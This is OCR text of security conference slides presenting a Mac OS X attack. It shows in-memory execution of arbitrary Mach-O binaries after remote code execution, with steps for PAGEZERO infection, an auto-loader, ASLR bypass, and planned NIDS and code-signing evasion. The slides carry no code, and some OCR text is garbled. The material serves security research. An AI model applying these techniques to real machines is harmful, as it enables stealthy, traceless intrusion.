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Who am I? 

Student at Politecnico di Milano. 

Security Consultant at Secure Network 
srl. 

Reverse Engineer at Zynamics GmbH. 
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Goal of the talk 
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■In-memory execution of arbitrary binaries 
on a Mac OS X machine. 
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Mach-0 file 

Header structure: information on the target 
architecture and options to interpret the file. 

Load commands: symbol table location, 
registers state. 

Segments: define region of the virtual 
memory, contain sections with code or data. 
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Segment and Sections 







Virtual 
address 
0x1000 

Virtual 

memory size 

0x1000 

File Offset 
0x0 

File Size 
0x1000 




Virtual 
Address 
0x1 d54 

Virtual 
memory size 

0x275 

File Offset 
0xd54 



Black Hat Briefings 



Important segments 






PAGEZERO, if a piece of code accesses 

NULL it lands here, no protection flags. 

TEXT, holds code and read-only data. RX 

protection. 

DATA, holds data. RW protection. 

LINKEDIT, holds information for the 

dynamic linker including symbol and string 
tables. RW protection. 
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Mach-0 representation 






Hoador 






Lead commands 








Segment command 1 
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Section 1 data 






Section 2 JuUi 
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Binary execution 
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Conducted by the kernel and the 
dynamic linker. 

The kernel, when finishes his part, 
jumps to the dynamic linker entry point. 

The dynamic linker is not randomized. 
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Execution steps 






kernel 

^ Maps the dynamic linker 
in the process address 
space. 

• Parses the header 

■ 

structure and loads all 
segments. 

" Creates a new stack. 



Dynamic linker 

• Retrieves base address 
of the binary. 

• Resolves symbols. 

• Resolves library 
dependencies. 

• Jumps to the binary entry 
point. 
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Stack 

Mach-0 file base address. 
Command line arguments. 
Environment variables. 
Execution path. 
All padded. 
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Stack representation 






Macri-o 
Address 










Argc 




Argv[] 









Envp[] 









exec_path ptr 









exec_path 




Argv[] strings 




Envp[] strings 
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Proposed attack 
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Userland-exec attack. 

Encapsulate a shellcode, aka auto- 
loader, and a crafted stack in the 
injected binary. 

Execute the auto-loader in the address 
space of the attacked process. 
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Who: an attacker with a remote code 
execution in his pocket. 

Where: the attack is two-staged. First 
run a shellcode to receive the binary, 
then run the auto-loader contained in 
the binary. 

Why: later in this talk. 
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What kind of binaries? 
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Any Mach-0 file, from Is to Safari 
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A nice picture 



■ fl) Exploit code ^ MachoFly pay load — ^ I 

(2) Macho Fly auto- loader - arbitrary Mach-o ->■ I 
< (3) arbitrary Mach-o response/output — J 



MachoFly loader 
ready 



Attacker 



Victim 
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Infected binary 

We need to find a place to store the 
auto-loader and the crafted stack. 

PAGEZERO infection technique. 

Cavity infector technique. 
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PAGEZERO INFECTION 



Change PAGEZERO protection flags 

with a custom value. 

Store the crafted stack and the auto- 
loader code at the end of the binary. 

Point _PAGEZERO to the crafted 
stack. 

Overwrite the first bytes of the file with 
the auto-loader address. 



■ 
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Binary layout 








MODIFIED HEADER 










INFECTED _PAGEZERO 




load commands and segments 


sections and binary data 


SHELLCODE 




CRAFTED STACK 
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Auto-loader 

Impersonates the kernel. 
Un-maps the old binary. 
Maps the new one. 
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Auto-loader description 






Parses the binary. 

Reads the virtual addresses of the 
injected binary segments. 

Unloads the attacked binary segments 
pointed by the virtual addresses. 

Loads the injected binary segments. 
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Auto-loader description(2) 

Maps the crafted stack referenced by 
_PAGEZERO. 

Cleans registers. 

Cleans some libSystem variables. 

Jumps to dynamic linker entry point. 



■ 
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We do like pictures, don't we? 






Victim's process address space 
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TEXT 



DATA LINKEDIT 



SEGMENT-N 
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libSystem variables 



_malloc_def_zone_state 
_NXArgv_po inter 
_malloc_num_zones 
keymgr_global 
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Why are those variables 
important? 

They are used in the initialization of 
malloc. 

Two of them are used for command line 
arguments parsing. 

Not cleaning them will result in a crash. 
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Hunts the variables 

Mac OS X Leopard has ASLR for 
libraries. 

Those variables are not exported. 

Cannot use dlopen()/dlsym() combo. 
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Mach-0 file structure 

XNU binary execution 

Attack technique 

• Defeat ASLR on libraries to enhance 
the attack 
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Defeat ASLR 






• Retrieve libSystem in-memory base 
address. 

■• Read symbols from the libSystem 
binary. 

[■• Adjust symbols to the new address. 
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How ASLR works in Leopard 

Only libraries are randomized. 

The randomization is performed 
whenever the system or the libraries are 
updated. 

Library segments addresses are saved 
in dyld_shared_cache_arch.map. 



■ 

■ 
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Retrieve libSystem address 



Parse 

dyld_shared_cache_ 
i386.map and 
search for libSystem 
entry. 



Adopt functions 
exported by the 
dynamic linker and 
perform the whole 
task in-memory. 



■ 

■ 
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Dyld functions 






_dyld_image_count() used to retrieve the 
number of linked libraries of a process. 

_dyld_get_image_header() used to retrieve 
the base address of each library. 

_dyld_get_image_name() used to retrieve 
the name of a given library. 
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Find 'em 

Parse dyld load commands. 

Retrieve LINKEDIT address. 

Iterate dyld symbol table and search for 
the functions name in LINKEDIT. 
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Back to libSystem 
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Non-exported symbols are taken out 
from the symbol table when loaded. 

Open libSystem binary, find the 
variables in the symbol table. 

Adjust variables to the base address of 
the in-memory DATA segment. 
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Put pieces together 






Iterate the header structure of libSystem 

in-memory and find the DATA base 

address. 
- DATA base address 0x2000 

- Symbol at 0x2054 

- In-memory DATA base address 0x4000 

- Symbol in-memory at 0x4054 
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Results 






Run a binary into an arbitrary machine. 

No traces on the hard-disk. 

No execve(), the kernel doesn't know 
about us. 

It works with every binary. 

It is possible to write payloads in a high 
level language. 
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Demo description 
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Run a simple piece of code which acts 
like a shellcode and retrieve the binary. 

Execute the attack with nmap and 
Safari. 

Show network dump. 

Show memory layout before and after 
the attack. 
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DEMO 
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Future developments 






Employ encryption to avoid NIDS 
detection. 

Using cavity infector technique. 

Port the code to iPhone to evade code 
signing protection ( Catch you at BH 
Europe). 
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Thanks, questions? 
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